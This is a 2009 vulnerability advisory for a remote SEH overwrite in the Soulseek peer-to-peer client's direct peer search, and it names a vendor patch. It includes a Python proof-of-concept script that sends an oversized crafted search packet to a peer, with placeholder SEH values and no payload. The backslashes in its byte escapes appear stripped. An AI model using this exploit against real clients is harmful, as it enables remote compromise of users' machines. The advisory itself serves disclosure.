Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution ============================================= - Release date: July 02, 2009 - Discovered by: Laurent Gaffi ; http://g-laurent.blogspot.com/ - Severity: critical ============================================= I. VULNERABILITY ------------------------- Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution II. BACKGROUND ------------------------- "Soulseek(tm) is a unique ad-free, spyware free, and just plain free file sharing application. One of the things that makes Soulseek(tm) unique is our community and community-related features. Based on peer-to-peer technology, virtual rooms allow you to meet people with the same interests, share information, and chat freely using real-time messages in public or private. Soulseek(tm), with its built-in people matching system, is a great way to make new friends and expand your mind!" III. DESCRIPTION ------------------------- Soulseek client allows direct peer file search, allowing a user to find the files he wants directly on the peer computer. Unfortunatly this feature is vulnerable to a remote SEH overwrite. IV. PROOF OF CONCEPT ------------------------- This proof of concept will target a user called 123yow123. import struct import sys, socket from time import * ip = "IP_ADDR" port = "PORT_NUM" #You can find out, how to find out IP/PORT if you RTFM :) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((ip,port)) except: print "Can't connect to peer!n" sys.exit(0) junk = "x41" * 3084 next_seh = struct.pack('<L', 0x42424242) seh = struct.pack('<L', 0x43434343) other_junk = "x61" * 1424 buffer = "x17x00x00x00x01x09x00x00x00x31x32x33x79x6fx77x31" buffer+= "x32x33x01x00x00x00x50x00x00x00x00x21x0cx00x00x08" buffer+= "x00x00x00x6cx7bx1dx0cx15x0cx00x00"+junk+next_seh+seh+other_junk s.send(buffer) After the query is send, the SEH handler will get overwriten. V. BUSINESS IMPACT ------------------------- An attacker could exploit this vulnerability to compromise any prior to 157 NS 13e Soulseek client VI. SYSTEMS AFFECTED ------------------------- Windows all versions VII. SOLUTION ------------------------- Upgrade to 157 NS 13e (http://slsknet.org/download.html) VIII. REFERENCES ------------------------- http://www.slsknet.org IX. CREDITS ------------------------- This vulnerability has been discovered by Laurent Gaffi Laurent.gaffie{remove-this}(at)gmail.com X. REVISION HISTORY ------------------------- july 02, 2009 XI. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. XII. PERSONAL NOTES ------------------------ Souleek team as patched this bug month ago, a distributed message urging users to upgrade them Soulseek client is still send since a month, and not much users still use vulnerable Soulseek versions. + to the one who like to rip bugs and make an exploit ""universal"" for fame, just make sure it's at least universal before you say so. For the others : http://www.youtube.com/watch?v=tVACUjHn6yU :) @RIIA : http://www.openp2p.com/pub/a/p2p/2002/12/11/piracy.html